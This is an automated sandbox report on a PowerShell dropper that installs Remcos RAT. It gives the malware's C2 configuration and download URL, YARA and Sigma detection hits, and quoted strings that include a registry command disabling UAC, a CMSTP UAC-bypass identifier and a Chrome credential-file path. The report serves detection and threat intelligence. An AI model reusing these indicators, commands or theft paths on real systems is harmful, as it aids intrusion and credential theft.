Edit tour

Windows Analysis Report
cozzy.ps1

Overview

General Information

Sample name:	cozzy.ps1
Analysis ID:	1638294
MD5:	7e6517b0f94a6ab3065d91ff648fa8fe
SHA1:	6a6931d1b7c6b56bbf5620247d2245d57ed082bf
SHA256:	30e18188bc57173766d721ca1c2f148c4c1195b9d4eacc9ed67978ba7c3059b8
Tags:	ps1user-TornadoAV_dev
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Found suspicious powershell code related to unpacking or dynamic code loading

Joe Sandbox ML detected suspicious sample

Powershell drops PE file

Uses dynamic DNS services

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain checking for process token information

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 8168 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cozzy.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

x.exe (PID: 7332 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 59F0B75B8E40BB7D1868FE084B5CDC66)

RegAAsm.exe (PID: 7516 cmdline: "C:\Users\user\AppData\Local\Temp\RegAAsm.exe" MD5: D249E2B6F10508DA70305BB27BBF43E6)

notepad.exe (PID: 1624 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\cozzy.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["remyma.duckdns.org:52507:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7J4RV4", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x761ea:$a1: Remcos restarted by watchdog! 0x76912:$a3: %02i:%02i:%02i:%03i

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\RegAAsm.exe	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Local\Temp\RegAAsm.exe	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\AppData\Local\Temp\RegAAsm.exe	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6bd58:$a1: Remcos restarted by watchdog! 0x6c3a8:$a3: %02i:%02i:%02i:%03i
C:\Users\user\AppData\Local\Temp\RegAAsm.exe	REMCOS_RAT_variants	unknown	unknown	0x65ff4:$str_a1: C:\Windows\System32\cmd.exe 0x65f70:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65f70:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66470:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66ad8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x66064:$str_b2: Executing file: 0x66e9c:$str_b3: GetDirectListeningPort 0x668c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66a48:$str_b7: \update.vbs 0x6608c:$str_b9: Downloaded file: 0x66078:$str_b10: Downloading file: 0x6611c:$str_b12: Failed to upload file: 0x66e64:$str_b13: StartForward 0x66e84:$str_b14: StopForward 0x669a0:$str_b15: fso.DeleteFile " 0x66934:$str_b16: On Error Resume Next 0x669d0:$str_b17: fso.DeleteFolder " 0x6610c:$str_b18: Uploaded file: 0x660cc:$str_b19: Unable to delete: 0x66968:$str_b20: while fso.FileExists(" 0x665a9:$str_c0: [Firefox StoredLogins not found]
C:\Users\user\AppData\Local\Temp\RegAAsm.exe	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65e78:$s1: CoGetObject 0x65e8c:$s1: CoGetObject 0x65ea8:$s1: CoGetObject 0x6fc56:$s1: CoGetObject 0x65e38:$s2: Elevation:Administrator!new:
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x14758:$a1: Remcos restarted by watchdog! 0x14da8:$a3: %02i:%02i:%02i:%03i
00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x5c808:$a1: Remcos restarted by watchdog! 0x5ce58:$a3: %02i:%02i:%02i:%03i
00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x14758:$a1: Remcos restarted by watchdog! 0x14da8:$a3: %02i:%02i:%02i:%03i
00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c878:$a1: Remcos restarted by watchdog! 0x6cec8:$a3: %02i:%02i:%02i:%03i
Process Memory Space: powershell.exe PID: 8168	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2c90:$b1: ::WriteAllBytes( 0x1f85aa:$b1: ::WriteAllBytes( 0x2cac:$b2: ::FromBase64String( 0x1f85c6:$b2: ::FromBase64String( 0xf284b:$s1: -join 0xff920:$s1: -join 0x102cf2:$s1: -join 0x1033a4:$s1: -join 0x104e95:$s1: -join 0x10709b:$s1: -join 0x1078c2:$s1: -join 0x108132:$s1: -join 0x10886d:$s1: -join 0x10889f:$s1: -join 0x1088e7:$s1: -join 0x108906:$s1: -join 0x109156:$s1: -join 0x1092d2:$s1: -join 0x10934a:$s1: -join 0x1093dd:$s1: -join 0x109643:$s1: -join
Process Memory Space: x.exe PID: 7332	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: x.exe PID: 7332	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: x.exe PID: 7332	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: x.exe PID: 7332	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xf89e:$a1: Remcos restarted by watchdog! 0x3593f:$a1: Remcos restarted by watchdog! 0x3ffb3:$a1: Remcos restarted by watchdog! 0xfef3:$a3: %02i:%02i:%02i:%03i 0x10330:$a3: %02i:%02i:%02i:%03i 0x40608:$a3: %02i:%02i:%02i:%03i 0x40a45:$a3: %02i:%02i:%02i:%03i
Process Memory Space: RegAAsm.exe PID: 7516	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: RegAAsm.exe PID: 7516	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: RegAAsm.exe PID: 7516	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: RegAAsm.exe PID: 7516	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x109ac:$a1: Remcos restarted by watchdog! 0x1ee1d:$a1: Remcos restarted by watchdog! 0x11001:$a3: %02i:%02i:%02i:%03i 0x1143e:$a3: %02i:%02i:%02i:%03i 0x1f472:$a3: %02i:%02i:%02i:%03i 0x1f8af:$a3: %02i:%02i:%02i:%03i
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.0.RegAAsm.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.0.RegAAsm.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
4.0.RegAAsm.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
4.0.RegAAsm.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6bd58:$a1: Remcos restarted by watchdog! 0x6c3a8:$a3: %02i:%02i:%02i:%03i
4.0.RegAAsm.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x65ff4:$str_a1: C:\Windows\System32\cmd.exe 0x65f70:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65f70:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66470:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66ad8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x66064:$str_b2: Executing file: 0x66e9c:$str_b3: GetDirectListeningPort 0x668c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66a48:$str_b7: \update.vbs 0x6608c:$str_b9: Downloaded file: 0x66078:$str_b10: Downloading file: 0x6611c:$str_b12: Failed to upload file: 0x66e64:$str_b13: StartForward 0x66e84:$str_b14: StopForward 0x669a0:$str_b15: fso.DeleteFile " 0x66934:$str_b16: On Error Resume Next 0x669d0:$str_b17: fso.DeleteFolder " 0x6610c:$str_b18: Uploaded file: 0x660cc:$str_b19: Unable to delete: 0x66968:$str_b20: while fso.FileExists(" 0x665a9:$str_c0: [Firefox StoredLogins not found]
4.0.RegAAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65e78:$s1: CoGetObject 0x65e8c:$s1: CoGetObject 0x65ea8:$s1: CoGetObject 0x6fc56:$s1: CoGetObject 0x65e38:$s2: Elevation:Administrator!new:
3.2.x.exe.13631b20.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
3.2.x.exe.13631b20.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
3.2.x.exe.13631b20.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.x.exe.13631b20.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6bd58:$a1: Remcos restarted by watchdog! 0x6c3a8:$a3: %02i:%02i:%02i:%03i
3.2.x.exe.13631b20.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x65ff4:$str_a1: C:\Windows\System32\cmd.exe 0x65f70:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65f70:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66470:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66ad8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x66064:$str_b2: Executing file: 0x66e9c:$str_b3: GetDirectListeningPort 0x668c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66a48:$str_b7: \update.vbs 0x6608c:$str_b9: Downloaded file: 0x66078:$str_b10: Downloading file: 0x6611c:$str_b12: Failed to upload file: 0x66e64:$str_b13: StartForward 0x66e84:$str_b14: StopForward 0x669a0:$str_b15: fso.DeleteFile " 0x66934:$str_b16: On Error Resume Next 0x669d0:$str_b17: fso.DeleteFolder " 0x6610c:$str_b18: Uploaded file: 0x660cc:$str_b19: Unable to delete: 0x66968:$str_b20: while fso.FileExists(" 0x665a9:$str_c0: [Firefox StoredLogins not found]
3.2.x.exe.13631b20.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65e78:$s1: CoGetObject 0x65e8c:$s1: CoGetObject 0x65ea8:$s1: CoGetObject 0x6fc56:$s1: CoGetObject 0x65e38:$s2: Elevation:Administrator!new:
3.2.x.exe.13631b20.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
3.2.x.exe.13631b20.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
3.2.x.exe.13631b20.2.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.x.exe.13631b20.2.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a358:$a1: Remcos restarted by watchdog! 0x6a9a8:$a3: %02i:%02i:%02i:%03i
3.2.x.exe.13631b20.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x645f4:$str_a1: C:\Windows\System32\cmd.exe 0x64570:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64570:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x650d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64664:$str_b2: Executing file: 0x6549c:$str_b3: GetDirectListeningPort 0x64ec8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65048:$str_b7: \update.vbs 0x6468c:$str_b9: Downloaded file: 0x64678:$str_b10: Downloading file: 0x6471c:$str_b12: Failed to upload file: 0x65464:$str_b13: StartForward 0x65484:$str_b14: StopForward 0x64fa0:$str_b15: fso.DeleteFile " 0x64f34:$str_b16: On Error Resume Next 0x64fd0:$str_b17: fso.DeleteFolder " 0x6470c:$str_b18: Uploaded file: 0x646cc:$str_b19: Unable to delete: 0x64f68:$str_b20: while fso.FileExists(" 0x64ba9:$str_c0: [Firefox StoredLogins not found]
3.2.x.exe.13631b20.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x644e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64478:$s1: CoGetObject 0x6448c:$s1: CoGetObject 0x644a8:$s1: CoGetObject 0x6e256:$s1: CoGetObject 0x64438:$s2: Elevation:Administrator!new:
4.2.RegAAsm.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.2.RegAAsm.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
4.2.RegAAsm.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
4.2.RegAAsm.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6bd58:$a1: Remcos restarted by watchdog! 0x6c3a8:$a3: %02i:%02i:%02i:%03i
4.2.RegAAsm.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x65ff4:$str_a1: C:\Windows\System32\cmd.exe 0x65f70:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65f70:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66470:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66ad8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x66064:$str_b2: Executing file: 0x66e9c:$str_b3: GetDirectListeningPort 0x668c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66a48:$str_b7: \update.vbs 0x6608c:$str_b9: Downloaded file: 0x66078:$str_b10: Downloading file: 0x6611c:$str_b12: Failed to upload file: 0x66e64:$str_b13: StartForward 0x66e84:$str_b14: StopForward 0x669a0:$str_b15: fso.DeleteFile " 0x66934:$str_b16: On Error Resume Next 0x669d0:$str_b17: fso.DeleteFolder " 0x6610c:$str_b18: Uploaded file: 0x660cc:$str_b19: Unable to delete: 0x66968:$str_b20: while fso.FileExists(" 0x665a9:$str_c0: [Firefox StoredLogins not found]
4.2.RegAAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65e78:$s1: CoGetObject 0x65e8c:$s1: CoGetObject 0x65ea8:$s1: CoGetObject 0x6fc56:$s1: CoGetObject 0x65e38:$s2: Elevation:Administrator!new:
Click to see the 19 entries

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cozzy.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cozzy.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1132, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cozzy.ps1", ProcessId: 8168, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cozzy.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cozzy.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1132, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cozzy.ps1", ProcessId: 8168, ProcessName: powershell.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 26 25 82 37 90 1B 85 BD 1B BF 3F 60 76 33 60 A0 A2 A6 C1 87 8F 36 C8 01 83 6E 3D 32 E4 9E 0A 93 49 1E 5F C3 63 09 F1 62 09 ED 12 CA 1F C3 BB 09 AD 50 EC 7F 0E 66 36 FA 95 A3 6E FC 4F 37 94 85 F7 2B 32 3A 16 50 FD BE 61 89 69 8E 09 03 FC 09 6B 96 1B EA D9 5A 7A 04 69 EF DA 22 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, ProcessId: 7516, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-7J4RV4\exepath

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T11:10:57.953236+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49718	172.94.9.132	52507	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T11:10:59.550036+0100	2803304	3	Unknown Traffic	192.168.2.4	49719	178.237.33.50	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://176.65.144.3/dev/cozyrem.exe	Avira URL Cloud: Label: malware
Source: remyma.duckdns.org	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\x.exe	Avira: detection malicious, Label: TR/AVI.Agent.rwsyp

Found malware configuration

Source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["remyma.duckdns.org:52507:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7J4RV4", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Temp\x.exe	ReversingLabs: Detection: 41%

Multi AV Scanner detection for submitted file

Source: cozzy.ps1	Virustotal: Detection: 27%			Perma Link
Source: cozzy.ps1	ReversingLabs: Detection: 31%

Yara detected Remcos RAT

Source: Yara match	File source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x.exe PID: 7332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAAsm.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.3% probability

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_00433B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

4_2_00433B64

